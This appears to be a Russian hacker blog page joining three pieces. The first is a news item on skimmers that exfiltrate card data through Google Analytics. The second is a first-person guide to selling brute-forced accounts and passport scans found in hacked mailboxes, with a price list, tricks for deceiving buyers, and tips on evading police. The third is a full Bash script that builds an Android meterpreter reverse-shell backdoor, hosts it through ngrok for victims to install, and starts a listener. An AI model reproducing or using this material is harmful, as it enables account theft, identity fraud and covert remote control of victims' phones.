Хакеры используют аналитику Google для обхода CSP и кражи данных с кредитных карт

В понедельник стало известнно, что хакеры теперь используют сервис Google Analytics для кражи информации о кредитных картах с сайтов электронной коммерции. Как же такое наслучалось?

Сразу несколько крупных компаний заявило о том, что данные пользователей в опасности: PerimeterX, Kaspersky и Sansec. В отчетах сообщается, что мошенники внедряют код, ворующий кредитки, на скомпрометированных веб-сайтах в сочетании с кодом Google Analytics, причем используя их собственную учетную запись, что позволяет им отфильтровывать платежную информацию, введенную пользователями, даже при условиях условия, в которых применяются политика безопасности контента.

«Злоумышленники внедрили вредоносный код в сайты, которые собирали все данные, введенные пользователями, а затем отправляли их через Analytics», – заявили в лаборатории Касперского. «В результате злоумышленники могут получить доступ к украденным данным через аккаунты Google Analytics».

В лаборатории Касперского уже сообщеили о том, что нашли несколько десятков сайтов, преимущественно в европе, кравших данные о пластиковых картах таким образом.

Обход CSP

Атака основана на том, что веб-сайты электронной коммерции, использующие службу веб-аналитики Google для отслеживания посетителей, включили соответствующие домены в свою политику безопасности контента (CSP).

CSP – это мера безопасности, помогающая обнаруживать и устранять угрозы, возникающие из-за уязвимостей межсайтового скриптинга и других форм атак с внедрением кода.

CSP позволяет веб-мастерам определять набор доменов, с которыми веб-браузер может взаимодействовать, тем самым предотвращая выполнение ненадежного кода.

«Источником проблемы является то, что система правил CSP недостаточно детализирована», – сказал вице-президент PerimeterX по исследованиям Амир Шакед. «Для распознавания и остановки вышеуказанного вредоносного запроса JavaScript требуются расширенные решения для обеспечения видимости, которые могут обнаруживать доступ и фильтрацию конфиденциальных пользовательских данных».

Для сбора данных этим методом достаточно всего небольшого фрагмента кода JavaScript, который передает собранные данные, такие как учетные данные пользвателя и информацию о совершонном платеже, через евенты и другие параметры, которые Google Analytics использует для уникальной идентификации различных действий, выполняемых на сайте.

Очень простая и эффективная атака. Кто там уже полез ковырять свой стилер?

На базе: приватные базы для брута. Создание, эксплуатация, профит. Часть 2

Привет, читатель. Это вторая часть статьи о приватных базах. Если в первой части мы набирали материал, то во второй я разберу основные способы получения профита в денежном эквиваленте. Я покажу всего три базовых способа:

  • 1 – Продавать базы, не работая по ним
  • 2 – Продавать материал сразу после брутфорса
  • 3 – Продавать материал, тщательно его разбирая

Первый вариант

Вариант со сливом базы по дешёвке самый простой, но и не самый прибыльный. Всё делается очень просто: находим тематический чат с “даркнет” или “нео-даркнет” тематикой , заходим, активничаем в нём некоторое время (чтобы не забанили), и как бы невзначай говорим, мол, у нас есть очень интересный и хороший, свежий товар.

Важно правильно подать имеющийся материал, поэтому можно немного преувеличить. Например, рассказать о большой валидности строк и не менее большом количестве аккаунтов с каждой строки. Главное – не переусердствуйте. Если потребуют доказательства – можно подделать скриншот с количеством валидных аккаунтов. Если будете продавать базы – будьте готов дать около ста ил тысячи строк на тест. Если вы хотите привлечь клиентов, то можете в эту тысячу или сотню строк искусственно подмешать валидные аккаунты. Их можно создать самому, или же отработать всю базу заранее и использовать часть гудов, вбросить в пробник. Да, грязный приём, но рабочий. Не злоупотребляйте им.

Так же не забывайте, что обычно продают только тематические базы. Мы же продаём “универсальную”. До этого мы “проверяли” её на ВК, и валид был более 30 аккаунтов. Соответственно, можем продавать её как тематическую.

Так как вы – ноунейм, то не рассчитывайте на быстрый и большой заработок. Вам нужно сделать имя. Есть два пути:

  • 1 – путь скамера. Самый быстрый, но грязный.
  • 2 честный путь. Долгий, но результат будет гарантирован.

В пером варианте вам нужно будет закупиться отзывами и рекламой. Подобная огласка точно привлечёт чужое внимание. Почему “путь скамера”? Потому что этим зачастую пользуются мошенники. Вы никак не проверите репутацию человека, ведь всё, что есть – слухи. Конечно, можно купить рекламу своего магазина и услуг сразу, но я советую делать это только после получения реальных отзывов. Коллекционировать их можно в отдельном канале, куда будете пересылать сообщения благодарных клиентов.

Во втором пути нам потребуется время, но результат будет гарантирован. Для этого нужно привлечь к себе внимание. Я, например, устраивал в чатах крупные раздачи и просто раскидывал “халяву”. Люди знают, что я не обману, и поэтому мне доверяют. Не обязательно раздавать только продаваемый вами материал. Люди падки на халяву, поэтому можно раздавать фактически что угодно. Для начала можно раздавать сбрученные аккаунты тех ресурсов, которые вы не собираетесь продавать. Например, если вы продаёте ВК, то можете отдельно раздавать аккаунты Origin и так далее.
В этом варианте есть и свои грязные трюки, один из которых, признаюсь, я использовал и использую по сей день. Например, раздача стимовских ключей. Этим я не злоупотребляю. Порой очень сильно выручает, когда раздавать толком нечего, а поддерживать себя на плаву нужно. Суть проста: со взломанного аккаунта пишем в группы, которые раздают халявные ключи. В итоге с одного аккаунта ВК мы можем раздать от пяти стимовских ключей. После этого блокируем бота, удаляем сообщения и отправляем аккаунт обратно на полку магазина.

Я шёл по второму пути, раздавал ходовой на то время товар (чем, кстати, портил многим продавцам жизнь и даже иногда предъявлял им за высокие цены) чем набивал набивал “карму” и делал имя. Соответственно, результат не заставил себя ждать и сразу после моего предложения появился первый клиент:

кивас левый, не переживайте

Вы можете продавать дороже или дешевле, устанавливая свою цену. Как видите, заработать на дошик с этой темой можно, причём относительно просто. И да, в этом варианте я продешевил, с таким валидом (на что бы он там не чекал), нужно было отдавать от 200 рублей.

Второй вариант

Тут мы будем продавать отработанный материал. Его продать немного тяжелее, но в итоге денег мы получим больше.

Завлёк халявой. Всегда так делаю. Тут пришлось подождать, но в итоге нашёлся желающий. Немного странный человек, но договориться нам удалось.

Не думайте, что всё так просто. Некоторые я раздал за так. Иногда репутация важнее денег, поэтому слово нужно держать.

Всегда помните, что есть другие продавцы. В этой сфере огромная конкуренция.

Третий способ

Этим способом лучше всего разбирать почтовые аккаунты, так как там поиск и фильтр поиска гораздо лучше. Это более детальный разбор добытого добра, где мы будем оценивать нашу добычу.

Для начала разберем аккаунты ВК, будем продавать их не пачками, а отдельно. Я выберу один из отработанных мною ранее. Так как мы оцениваем социальную сеть, то и критерии будут совершенно другими, в отличии от той же самой почты. Основные критерии выглядят следующим образом:

Активность аккаунта

Если аккаунт был активен в этом месяце, то это явный минус к его цене. Дело в том, что активные аккаунты не пользуются большим спросом, так как его хозяин может в любой момент осознать, что его взломали и сменить пароль, тогда аккаунт будет невалидным. Это – большой риск, поэтому и минус в цене. Если же аккаунт недавно созданный или же давно неактив – это цене в плюс. Посмотреть активность можно по сообщениям или же в настройках сессий

Пример “мёртвого” аккаунта
Пример “живого” аккаунта. Маминым хакерам привет

Количество друзей и их активность

Это косвенный критерий, но, чем больше у человека друзей, тем выше цена на аккаунт. Их активность так же влияет на цену в лучшую сторону. Обычно активность нужна для создания видимости огромной востребованности, чтобы вызывать больше доверия у других пользователей. Этот критерий пользуется спросом в основном у скамеров, но и то не всегда.

Наличие фотографий и записей

Тут ситуация такая же, как и с друзьями – видимость активности аккаунта.

Пример два в одном

Администрирование групп

Чем больше в администрируемых жертвой группах подписчиков, тем выше цена. Это не самый важный критерий, но может сильно повлиять на цену. Подобные группы используются для рекламы собственных проектов или того же скама, но от лица всего сообщества, которому сто процентов доверяют

Баланс

Если в аккаунте, например, ВКонтакте, есть некая сумма (голоса, например), то это значительно повышает стоимость аккаунта. Думаю, не стоит объяснять почему.

давайте же вычленим какой-нибудь сочный аккаунт и попробуем его продать.

Я не стал писать про имеющиеся аккаунты, а выдал что-то типа “продаю аккаунты под ключ”, и ко мне почти сразу потянулись

Дополнительные “плюшки”

Нет, это не те плюшки, о которых вы, возможно, подумали. Дело в том, что продавать можно не только сами аккаунты, но и сами данные, которые на нём находятся. Это может быть как игровая валюта, так и вполне осязаемые вещи, как, например, документы. С первым всё понятно – нужно ломать игровые аккаунты (если разбираться подробнее, то лучше всего для этих целей подходят аккаунты Origin с игрой FIFA. Монеты в этой игре пользуются спросом, Даже сейчас я могу привести в пример косвенно знакомых людей, которые на этом построили целый бизнес, скупали дёдики и брутили с них, арендовали офисы под ботов (зачем-то, не знаю зачем. Странные люди были), и имели с этого хорошую прибыль). Вообще я “познакомился” с ними когда вскрыл их аккаунты и магазины, откуда брал приватные брут-базы, отрабатывал, и с продажи игровых аккаунтов (так как базы были заточены под брут на игровые ресурсы) имел денег больше. Ребята до сих пор не догадались, что я тогда паразитировал на их деле, так что знакомство можно назвать условным), а со вторым уже немного посложнее. Второй вариант мы сейчас и рассмотрим во всех подробностях.

Чтобы получить “дополнительный поток прибыли” – нужно ломать\брутить почтовые аккаунты. Вообще самый лучший вариант развития событий в нашем случае это именно взлом почты. Любая почта представляет из себя нервный центр, вокруг которого всё вертится. Все регистрации, все рабочие данные, все материалы. Если социальные сети созданы для общения, то почта для сухой передачи информации. Абсолютно все почтовые аккаунты содержат в себе огромное количества контента, который мы можем использовать в своих целях. Это что-то вроде, как я уже говорил, нервного центра, попав в который мы гарантированно получаем выгоду. Подобный подход можно сравнить с охотой: можно убить одним выстрелом в голову, в роли которого выступает взлом почтового аккаунта, а можно загнать в капкан, что сравнимо с брутфорсом по отдельным ресурсам.

Почту вы можете взломать с помощью способа, рассмотренного в первой части.

Работать я буду по ресурсу mail.ru. И сразу же вычленю все элементы, которые мы будем искать и объясню, в качестве чего добытые нами ресурсы могут быть использованы и почему на них есть спрос. Первое, что мы будем искать – сообщения с прикреплёнными файлами. Огромен шанс получить что-то ценное, типа паспортных данных. Конечно, там будут не только паспорта, но и другие интересные данные: накладные, билеты, данные об оплатах. Второе же, что мы будем проверять это данные регистраций. Mail.ru имеет подобный фильтр по “регистрациям”, но он обычно работает только на государственные сайты а другие игнорирует, поэтому пользоваться будем поиском по ключевым словам типа “пароль” или “password”.

Начнём с самого начала.

  • Документы
    В основном это паспорта. В большинстве случаев сканированные страницы паспорта используются для верификации электронных кошельков (и не только), реже – для скама. В основном спросом пользуются только разворот с пропиской и снилс в придачу.

Для начала мы найдём паспорт и попробуем его толкнуть. На него спрос точно будет, товар хоть и частый, но востребованный. Для этого заходим на заранее взломанный аккаунт почты и видим следующее:

 

Спасибо, мэйл_точка_ру, что заботишься о своих пользователях. Но не в нашу смену. Удаляем это сообщение. Нет, я серьёзно, это у них такие меры безопасности. Самые угарные, тупые и бессмысленные, которые я когда-либо видел. Тут всё просто: вбиваем в поиск ключевое слово “паспорт”, а в фильтрах выбираем фильтр “С вложениями”. После недолгой загрузки наблюдаем следующую картину:

Теперь вручную сортируем по файлам: В первую очередь нас будут интересовать графические файлы, типа JPG. Ну, на крайний случай PDF тоже сойдёт. Вот то, что мы искали:

Скачивать это я вам не советую, но если же вы вдруг собираетесь создавать собственное хранилище для подобного товара – стоит задержаться на этом пункте подольше. Думаю, в следующей статье я распишу, как создавать зашифрованный носитель, и как можно быстро от них избавиться, если вдруг к вам нагрянули дядьки в костюмах. Хотя какой смысл от них избавляться, если они у нас и так зашифрованы?

Теперь нужно вас сориентировать по ценам.

  • Разворот – 70 р
  • Разворот+прописка – 140 р
  • Селфи с паспортом – 200 р
  • Селфи с паспортом + прописка – 240р

Собственно, вот пример, показывающий востребованность товара. Здесь один из постоянных моих покупателей, мы друг-другу доверяем, и пруфовать друг-другу пересыл денег – излишняя трата времени.

Здесь за один заход было заработано около 300р. получилось около пяти сотен или тысячи рублей, не помню уже. Давненько было.

Это не основной способ доставать подобный товар, но как для старта – неплохо. Чтобы добывать этим способом много документов – нужно ломать корпоративные почты, почты компаний или же ИПшников Там документы всех мастей всегда в обороте (таким образом, помню, я лицензиями антивирусов раскидывался на халяву). Найти подобное чудо можно, если накрыть бизнес-форум. Об этом я напишу позже 😉

  • Дополнительные данные о регистрациях
    Через почту мы имеем фактически абсолютную власть над человеком. Мы можем восстановить фактически любой его аккаунт и привязать его к себе. Аккаунты игр, программ, и других сайтов могут пойти на прилавок нашего магазинчика.

А если вы не верите в работоспособность этого способа, то позвольте мне продемонстрировать почту администрации хмельницкого района, доступ к которой был получен именно через взломанную почту одного из сотрудников. К сожалению, доступ на неё был утерян (что было вопросом времени), но файлы остались:

Про взлом этой почты я могу целую книгу написать, как мы готовились, как мы старались и как в итоге всё оказалось просто.

Не спешите выбрасывать взломанные почты, ведь из этой почты может быть сделана целая ферма, на которой будут добываться данные в течении долгого времени. Такую ферму можно устроить из любой почты, на которой достаточно контента. Обычно это те же корпоративные почты, или же почты индивидуальных предпринимателей, потому что с простыми пользователями такое не прокатит: им попросту нечего обновлять, данные максимум на один раз. Но и таким почтам может быть своё применение.

Своё название «ферма» этот способ получил из-за его схожести с реальными фермами. Хакер не разово получает данные, а на протяжении долгого времени тянет все соки из этого ресурса. Считайте, это пассивная добыча материалов. И чем таких ферм больше, тем больше копится данных на продажу. А хозяева почтовых аккаунтов даже не подозревает, что кто-то получил к ним доступ.
Может и вам стоит проверить активные сеансы на вашей почте?

Чтобы получать с этой темы много денег – нужно её поставить на поток. Сделать это достаточно просто, но долго и скучно. Если вы вдруг захотите заняться этим серьёзно – вам потребуется создать собственную команду, состоящую минимум из трёх звеньев:

  • 1 – Добытчики
  • 2 – Конвейер
  • 3 – Работа с людьми

Добытчики – добывают эти самые базы. Чем добытчиков больше, тем больше у вас баз, что логично.

Конвейер – люди работают по добытым базам, разбирая их на контент для продажи. В своё время мне очень не хватало этих людей. Мало кому было интересно рыться в куче текста.

Работа с людьми – реклама, поддержание деловых отношений, обработка новых клиентов и т.д.. С обработкой клтиентов, на самом деле, может справиться и простой телеграм-бот. Но, опять же, это звено обязательно

Самый лучший вариант – делить всё по схеме 20\20\20\30\10:
20% уходит добытчикам
20% уходит конвейеру
20% уходит на работу с клиентами
30% чистой прибыли
10% уходит на внешние, сторонние затраты. Например, на рекламу. Можно эти проценты и себе присвоить, говоря, что уходит на содержание всей схемы, почему нет? Эти 10% у меня уходили на ведение журнала купли-продажи, так как у меня действовали акции на отдельных клиентов, а их условия невозможно было вписать в качестве скрипта, уж больно всё было гибко.

Набрав команду и поставив на поток вы будете получать достаточно неплохие деньги. Не забывайте, что даже работая в команде вы должны привлекать новых клиентов. Для этого можно устраивать раздачи в чатах, как я уже говорил. Но не от своего имени, а от имени команды. Только всё не раздавайте. торговать тоже надо чем-то. Договорившись с администрацией можно устраивать пиар-акции.

Если вы до этого “сделали имя” себе в чате – можете договориться с администраторами сообщества на бесплатную рекламу, предлагая процент с каждого клиента. те самые 10% можно будет отдавать им. Более того, администраторам будет выгодна подобная сделка, так как халява притягивает людей не только к вам, но и в чат канала, где вы устраиваете подобные раздачи. Смышлёные администраторы могут даже в рекламе своего канала написать, что на канале устраиваются раздачи контента, что привлечёт не только к ним новых подписчиков, но и к вам клиентов. Подобная коллаборация будет выгодна обеим сторонам, поэтому с вами на контакт пойдут в любом случае. Главное – не врывайтесь с предложением, а сами потихоньку, от своего лица устраивайте подобные акции, без рекламы, чтобы просто заинтересовать. Опять же, выбирайте выбирайте чаты: Они должны быть тематическими и достаточно масштабными. Не врывайтесь в профессиональные чаты, там вас не поймут.

Если же вы покупаете рекламу – делайте свой рекламный пост правильно, не бойтесь приукрашивать. В контакты ставьте кадров, которые ответственны за работу с людьми. Многие ставят себя или ботов. Примеры рекламных постов я приводить не буду, но если вам нужен шаблон – обратите внимание на более крупных ребят или даже на рекламу компаний. Нет, заниматься плагиатом не нужно, это будет сразу видно и плохо скажется на вашей репутации, но использовать как пример – почему нет?

Обратим внимание на тех, с кем мы работаем. Если у вас есть постоянные клиенты, то делаем вывод, что они не ради прикола покупают ваш товар, а действительно работают с ним, и если у них хватает денег на покупку нового материала, то деньги они зарабатывают точно. В этом случае можно предложить сотрудничество: Вы не будете больше ему продавать товар, а будете поставлять. Он же будет не покупать его, а отдавать процент со своей прибыли. В этом случае выгода будет для всех. Как минимум, это будет серьёзным подходом к делу, и подобный жест покажет вас как делового человека. Помните, что ваш клиент, с которым вы совершаете сделку так же может работать в команде, поэтому не просите делить его прибыль 50\50, а просите для себя 10% или 20%, но не больше, иначе спугнёте. Хотя, если человек работает с вами, то и поторговаться можно.

Я рассказал о самом простом способе заработка, которым сам когда-то промышлял. Как я говорил, на машину вы не накопите, но на доширак вам более чем хватит. Есть и другие, более серьёзные способы заработка, этот больше подходит для быстрого, нежели для постоянного. Хотя, если исхитрится, то можно и неплохо подняться на этом.

Есть вариант, где вы получаете максимальный профит. Здесь вы прежде чем продать полностью выжимаете все данные и ресурсы с аккаунтов для продажи, и продаём уже не только аккаунты, но и данные. В этом случае мы имеем минимальные потери – люди могут покупать аккаунты в поисках подобных данных (т.е. покупают 3 аккаунта почты за 15 рублей, с двух получают паспорта и продают уже их, по 150 рублей каждый, и схема повторяется, но количество растёт в геометрической прогрессии), а мы уже их отработали, и если подобное будет повторятся – мы будем иметь отток, хоть и не сильно большой. Однако, по деньгам будем иметь больше. В этом случае я советую разделять аккаунты “на продажу” и аккаунты “на отработку”, чтобы было честно.

Эта статья вышла достаточно короткой в основном из-за её темы. Я привык расписывать технические подробности, а не социальные. Меня больше интересуют системы, а не люди как таковые. Хотя, должен признать, люди не менее уязвимы и порой являются основными дырами в любой системе. Не доверяйте никому. Всем удачи и хорошего настроения, не попадайтесь 😉

P.S.
Простите за моё долгое отсутствие, были неотложные дела. Обещаю исправиться, и писать статьи чаще. Разумеется, на не менее интересные темы. Вообще эта статья могла быть куда длиннее, но в связи с утерей большей части архивов я не смог изложить все схемы построения деловых связей. На другие статьи эта потеря не повлияет.

Автоматизируем создание бекдора для Android

Все когда то задумывались как шпионить за мобильными устройствами. На самом деле – это проще чем кажется.

Сегодня мы научимся создавать пейлоады с помощью популярного инструмента, известного как msfvenom, и исследуем опции, доступные в этом инструменте, для создания полезных нагрузок с различными расширениями и методами.

Код: https://github.com/f4rber/APG

Слово payload буквально оно переводится как «полезная нагрузка». Под этим словом подразумевают код или часть вредоносной программы (червей, вирусов), который непосредственно выполняет деструктивное действие: удаляет данные, отправляет спам, шифрует данные, открывает подключение для хакера и т.д. Вредоносные программы также имеют overhead code (буквально «служебный код»), под которым понимается та часть кода, которая отвечает за доставку на атакуемую машину, самостоятельное распространения вредоносной программы или препятствует обнаружению.

Т.е. «полезная нагрузка» для пользователя («жертвы») является совсем не полезной.

Для атакующего полезная нагрузка является ключевым элементом, который необходимо доставить на компьютер цели и выполнить. Код полезной нагрузки может быть написан самостоятельно (и это правильный подход, позволяющий значительно снизить шансы обнаружения антивирусами – в этом вы быстро убедитесь сами, если будете пробовать запускать исполнимые файлы с полезной нагрузкой в системах с установленным антивирусом), а можно воспользоваться разнообразными генераторами полезной нагрузки. Суть работы этих программ заключается в том, что вы выбираете типичную задачу (например, инициализация оболочки для ввода команд с обратным подключением), а генератор выдаёт вам исполнимый код под выбранную платформу. Если у вас нет навыков в программировании, то это единственный возможный вариант.

Одним из самых популярных генераторов полезной нагрузки является MSFvenom. Это самостоятельная часть Metasploit, предназначенная для генерации полезной нагрузки.

Msfvenom удивителен тем, что у него есть возможность быстро и легко генерировать шелл-код, вы можете напрямую использовать полезные нагрузки, которые находятся в Metasploit Framework (windows/shell_reverse_tcp, linux/x86/meterpreter/reverse_tcp и многое другое). В большинстве случаев Msfvenom потребуется при разработке эксплойтов, таких как переполнение буфера.

Для генерации полезной нагрузки обязательными являются два флага: -p и -f.

Пример команды:

msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o /tmp/my_payload.exe

Здесь:

  • -p windows/meterpreter/reverse_tcp – выбранный тип полезной нагрузки
  • lhost=IP_атакующего – адрес атакующего, для обратного соединения с компьютера жертвы
  • lport=4444 – порт, к которому будет делаться обратное соединение
  • -f exe – формат полезной нагрузки (исполнимый файл Windows)
  • -o /tmp/my_payload.exe – сохранить сгенерированный код в указанный файл

После того как вы сгенерировали пейлоад нужно запустить exploit/multi/handler через msfconsole

На «атакующей» машине запускаем Metasploit:           

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Обратите внимание, что если вместо windows/meterpreter/reverse_tcp вы выбрали другую полезную нагрузку, то в предыдущей команде замените эту строку на свою.

Нужно установить настройки – IP и порт локальной машины:       

set LHOST 192.168.0.196
set LPORT 4444

Не забудьте строку 192.168.0.196 поменять на свой IP адрес. Если вы не меняли порт, то его можно не настраивать, поскольку значением по умолчанию является 4444.

Когда настройки сделаны, запустите выполнение модуля:

Run

Теперь на «цели» запустите исполнимый файл с полезной нагрузкой. Как только это будет сделано, бэкдор подключится к машине атакующего и откроется сессия meterpreter:

Для показа справки наберите ? или help. Разнообразных команд много. Если вы хотите получить информацию об опциях конкретной команды, напишите команду и добавьте флаг -h, например, следующая команда покажет опции модуля для управления веб-камерой:

webcam_snap -h

Автоматизация генерации пейлоада

Писать софт будем на Bash.

#!/bin/bash
#Colors
white="\033[1;37m"
grey="\033[0;37m"
purple="\033[0;35m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
purple="\033[0;35m"
cyan="\033[0;36m"
cafe="\033[0;33m"
fiuscha="\033[0;35m"
blue="\033[1;34m"
# Очищаем терминал при запуске скрипта
clear

При нажатии CTRL C программа спросит хотим ли мы удалить сгенерированный бекдор, если пользователь нажмет y, остановиться служба apache и .apk будет удален.

ctrlc () {
read -p "$(echo -e $red[$yellow!$red]$grey Delete .apk? [y/n]  )" descision
if [[ $descision == "y" ]]; then
     service apache2 stop
     eval "rm -rf /var/www/html/*.apk"
     eval "rm -rf *.apk"
else
     echo -e "C ya later\n"
fi
exit 1
}
trap ctrlc SIGINT
#Проверяем является ли пользователь root
if [[ $EUID -ne 0 ]]; then
        echo -e "          $yellow[!]$red Execute program as root $yellow[!]"
        echo -e "          $red    Type sudo ./apg.sh"
        exit 1

fi

Функция, которая сгенерирует пейлоад:

function payload() {
#LHOST
read -p "$(echo -e $red[$yellow+$red]$grey Enter LHOST: )" lhost
     echo -e "  \033[1;31mLHOST$grey =>$purple $lhost"
#LPORT
read -p "$(echo -e $red[$yellow+$red]$grey Enter LPORT: )" lport
     echo -e "  \033[1;31mLPORT$grey =>$purple $lport"
#Получаем имя файла
read -p "$(echo -e $red[$yellow+$red]$grey Enter payload name: )" payload_name
     echo -e "  \033[1;31mPayload Name$white =>$purple $payload_name"
msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R > $payload_name.apk
echo ""
echo -e "           $red[$yellow+$red]$yellow Payload successfuly generated $red[$yellow+$red]"
echo ""
}

Функция шифрования полученного бекдора (keytool зашифрует файл а jarsigner его подпишет):

function crypt() {
read -p "$(echo -e $red[$yellow+$red]$grey Do you wanna encrypt the payload $red[$yellow$payload_name.apk$red] $grey[y/n]: )" crypt
#Если пользователь нажал y или Y то начнется процесс шифрования и подписи
if [[ $crypt = "Y" ]]; then
     echo -e "\n  $red[$yellow+$red]$grey Payload encryption started\n"
     keytool -genkey -v -keystore key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
     jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore $payload_name.apk alias_name
     echo -e "\n  $red[$green+$red]$grey Your Payload Has Been Successfully Encrypted $red[$yellow+$red]\n"
elif [[ $crypt = "y" ]]; then
     echo -e "\n  $red[$yellow+$red]$grey Payload encryption started\n"
     keytool -genkey -v -keystore key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
     jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore $payload_name.apk alias_name
     echo -e "\n  $red[$yellow+$red]$grey Your payload has been successfully encrypted $red[$yellow+$red]\n"
else
     echo -e "\n  $red[$yellow!$red]$white Payload was not crypted $red[$yellow!$red]\n"
fi  
}

Для того что бы мы смогли передать файл “жертве” мы захостим его у себя на сервере apache и с помощью ngrok-а пробросим порты:

#Starting ngrok
function ngrok_server() {
#Если unzip, xterm или wget не установлены мы уведомим пользователя об этом
command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
command -v xterm > /dev/null 2>&1 || { echo >&2 "I require xterm but it's not installed. Install it. Aborting."; exit 1; }
command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
#Если архив с ngrok уже существует мы разархивируем его и после удалим архив
if [[ -e ngrok-stable-linux-386.zip ]]; then
     unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
     chmod +x ngrok
     rm -rf ngrok-stable-linux-386.zip
#Если файл ngrok уже существует мы выведем об этом сообщение
elif [[ -e ./ngrok ]]; then
     echo -e "ngrok already downloaded\n"
#Если ни один из вариантов не увенчался успехом мы скачаем ngrok
else
     echo -e "Downloading Ngrok...\n"
     wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
fi
#Запуск ngrok в терминале xterm
echo -e "Starting ngrok server...\n"
eval "xterm -e ./ngrok http 80 > /dev/null 2>&1 &"
sleep 10
#Выведем ссылку через которую можно будет скачать наш бекдор
echo -e "Direct link:"
eval "curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o 'http://[0-9a-z]*\.ngrok.io'"
slash="/"
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "http://[0-9a-z]*\.ngrok.io"); echo -e "$link$slash$payload_name.apk\n"
}

Запускаем exploit/multi/handler:

function listener() {
#Если пользователь введет y запуститься сессия multi/handler
read -p "$(echo -e $red[$yellow+$red]$grey Do you wanna start a listener [y/n]: )" listener
if [ $listener = "y" ];then
     echo -e "\n  $red[$yellow+$red]$grey Starting a listener .."
     echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost\nset LPORT $lport\nexploit" > listener.rc
     echo ""
     xterm -e 'msfconsole -r listener.rc'
elif [ $listener = "Y" ]; then
     echo -e "\n  $red[$yellow+$red]$grey Starting a listener .."
     echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost\nset LPORT $lport\nexploit" > listener.rc
     echo ""
     xterm -e 'msfconsole -r listener.rc'
else
     echo -e "\n  $red[$yellow!$red]$grey Skipping...\n"
fi
}

В конце файла мы запускаем функции:

payload
crypt
service apache2 start
eval "cp $payload_name.apk /var/www/html/"
ngrok_server
listener
#После завершения работы программы даем возможность удалить файлы и остановить службу apache
read -p "$(echo -e $red[$yellow!$red]$grey Delete .apk? [y/n]  )" descision
service apache2 stop
if [[ $descision == "y" ]]; then
     eval "rm -rf /var/www/html/*.apk"
     eval "rm -rf *.apk"
else
     echo -e "C ya later\n"
fi

После того как “жертва” скачала файл и запустила его мы получим сессию meterpreter:

Некоторые из команд доступные нам:

Заключение

Итак, как мы могли сами убедиться MSFvenom позволяет генерировать полезную нагрузку, а Meterpreter помогает скрыто управлять удалённой системой.

В целом это обзорная статья, цель которой – показать некоторые возможности Metasploit. В реальной практической ситуации нужно подобрать полезную нагрузку в соответствии с разными сценариями: на случай смены IP жертвой, на случай смены IP атакующим, решить проблемы доставки полезной нагрузки и избежание обнаружения антивирусами.